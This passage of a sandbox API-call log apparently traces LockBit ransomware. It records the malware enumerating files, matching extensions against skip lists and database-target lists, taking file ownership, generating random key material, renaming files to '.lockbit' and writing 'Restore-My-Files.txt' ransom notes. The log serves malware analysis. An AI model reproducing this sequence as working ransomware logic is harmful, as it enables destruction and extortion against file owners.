(pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png") returned=".png" [0082.676] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.676] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.676] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.676] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.676] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.677] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.677] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.677] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.677] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.677] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.677] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.677] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.677] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.677] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.677] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.677] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.677] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.677] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.677] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.677] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.677] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.677] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.677] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.677] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.677] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.677] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.677] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.677] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.677] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png.lockbit") returned 89 [0082.677] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\parentmenubuttonicon.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.678] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.678] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.678] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.679] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.679] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.679] RtlFreeAnsiString (AnsiString="\\") [0082.679] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0082.679] malloc (_Size=0x200) returned 0x77d800 [0082.679] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.679] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.679] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.679] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.681] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.681] CloseHandle (hObject=0x3c4) returned 1 [0082.682] free (_Block=0x77d800) [0082.682] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\parentmenubuttonicon.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.682] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.682] malloc (_Size=0x40068) returned 0x1fb18c0 [0082.682] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4525) returned 1 [0082.682] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.683] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0082.683] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.683] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0082.683] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0082.692] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.693] malloc (_Size=0xc8) returned 0x77d800 [0082.693] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc8, FileInformationClass=0xa) returned 0xc0000008 [0082.693] free (_Block=0x77d800) [0082.693] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.693] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.693] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.693] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7015e6e7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7015e6e7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dd7d253, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbef, dwReserved0=0x0, dwReserved1=0x0, cFileName="ParentMenuButtonIconSubpict.png", cAlternateFileName="")) returned 1 [0082.693] lstrcmpiW (lpString1=".", lpString2="ParentMenuButtonIconSubpict.png") returned -1 [0082.693] lstrcmpiW (lpString1="..", lpString2="ParentMenuButtonIconSubpict.png") returned -1 [0082.693] PathFindExtensionW (pszPath="ParentMenuButtonIconSubpict.png") returned=".png" [0082.693] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.693] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.693] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.693] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.693] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.693] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.693] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.693] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.693] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.693] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.693] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.694] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.694] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.694] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.694] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.694] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.694] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.694] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.694] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.694] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.695] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.695] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.695] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.695] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.695] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.695] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.695] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.695] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ParentMenuButtonIconSubpict.png") returned 1 [0082.695] lstrcmpiW (lpString1="ntldr", lpString2="ParentMenuButtonIconSubpict.png") returned -1 [0082.695] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ParentMenuButtonIconSubpict.png") returned -1 [0082.695] lstrcmpiW (lpString1="bootsect.bak", lpString2="ParentMenuButtonIconSubpict.png") returned -1 [0082.695] lstrcmpiW (lpString1="autorun.inf", lpString2="ParentMenuButtonIconSubpict.png") returned -1 [0082.695] lstrcmpiW (lpString1="thumbs.db", lpString2="ParentMenuButtonIconSubpict.png") returned 1 [0082.695] lstrcmpiW (lpString1="iconcache.db", lpString2="ParentMenuButtonIconSubpict.png") returned -1 [0082.695] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.695] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png") returned=".png" [0082.695] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.695] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.695] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.695] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.695] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.695] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.695] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.695] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.695] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.695] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.695] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.695] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.696] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.696] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.696] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.696] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.696] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.696] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.696] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.696] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.696] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.696] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.696] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.696] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.696] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.696] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.696] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.696] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.696] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png.lockbit") returned 96 [0082.696] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\parentmenubuttoniconsubpict.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.697] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.697] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.697] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.697] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.698] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.698] RtlFreeAnsiString (AnsiString="\\") [0082.698] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0082.698] malloc (_Size=0x200) returned 0x77d800 [0082.698] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.698] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.698] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.698] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.698] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.699] CloseHandle (hObject=0x3c4) returned 1 [0082.699] free (_Block=0x77d800) [0082.699] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\parentmenubuttoniconsubpict.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.699] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.699] malloc (_Size=0x40068) returned 0x1fb18c0 [0082.699] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3055) returned 1 [0082.699] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.700] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0082.700] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.700] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0082.700] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0082.706] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.706] malloc (_Size=0xd6) returned 0x77d800 [0082.706] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xd6, FileInformationClass=0xa) returned 0xc0000008 [0082.707] free (_Block=0x77d800) [0082.707] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.707] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.707] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.707] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70053d5c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70053d5c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dda33b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x629b, dwReserved0=0x0, dwReserved1=0x0, cFileName="performance.png", cAlternateFileName="")) returned 1 [0082.707] lstrcmpiW (lpString1=".", lpString2="performance.png") returned -1 [0082.707] lstrcmpiW (lpString1="..", lpString2="performance.png") returned -1 [0082.707] PathFindExtensionW (pszPath="performance.png") returned=".png" [0082.707] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.707] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.707] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.707] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.707] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.707] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.707] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.707] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.707] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.707] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.707] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.707] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.707] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.707] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.707] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.708] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.708] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.708] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.708] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.708] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.708] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.708] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.708] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.708] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.708] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.709] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.709] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.709] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.709] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.709] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="performance.png") returned 1 [0082.709] lstrcmpiW (lpString1="ntldr", lpString2="performance.png") returned -1 [0082.709] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="performance.png") returned -1 [0082.709] lstrcmpiW (lpString1="bootsect.bak", lpString2="performance.png") returned -1 [0082.709] lstrcmpiW (lpString1="autorun.inf", lpString2="performance.png") returned -1 [0082.709] lstrcmpiW (lpString1="thumbs.db", lpString2="performance.png") returned 1 [0082.709] lstrcmpiW (lpString1="iconcache.db", lpString2="performance.png") returned -1 [0082.709] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.709] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png") returned=".png" [0082.709] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.709] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.709] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.709] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.709] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.709] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.709] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.709] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.709] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.709] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.709] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.709] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.710] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.710] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.710] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.710] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.710] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.710] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.710] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.710] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.710] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.710] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.710] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.710] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.710] lstrcmpiW 